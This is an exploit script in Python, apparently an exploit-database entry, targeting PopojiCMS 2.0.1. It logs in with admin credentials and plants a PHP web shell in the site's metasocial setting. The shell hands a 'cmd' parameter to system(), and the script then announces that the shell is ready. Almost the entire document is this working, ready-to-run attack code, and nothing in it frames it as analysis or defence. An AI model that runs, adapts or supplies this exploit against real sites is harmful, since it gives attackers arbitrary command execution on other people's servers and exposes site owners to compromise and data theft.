# Exploit Title: PopojiCMS 2.0.1 - Remote Command Execution # Date: 14/04/2024 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://www.popojicms.org/ # Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip # Version: Version : 2.0.1 # Tested on: https://www.softaculous.com/apps/cms/PopojiCMS import requests import time import sys def exploit(url, username, password): login_url = f"{url}/po-admin/route.php?mod=login&act=proclogin" login_data = {"username": username, "password": password} headers = {"Content-Type": "application/x-www-form-urlencoded", "Referer": f "{url}/po-admin/index.php"} session = requests.Session() login_response = session.post(login_url, data=login_data, headers=headers) if "Administrator PopojiCMS" in login_response.text: print("Login Successful!") time.sleep(1) # 1 saniye bekle else: print("Login Failed!") return edit_url = f"{url}/po-admin/route.php?mod=setting&act=metasocial" edit_data = {"meta_content": """<html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html>"""} edit_response = session.post(edit_url, data=edit_data, headers=headers) if "cmd" in edit_response.text: print("Your shell is ready:", url) time.sleep(1) else: print("Exploit Failed!") return if __name__ == "__main__": if len(sys.argv) != 4: print("Kullanım: python exploit.py sitename username password") sys.exit(1) url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] print("Exploiting...") time.sleep(1) print("Logging in...") time.sleep(1) exploit(url, username, password)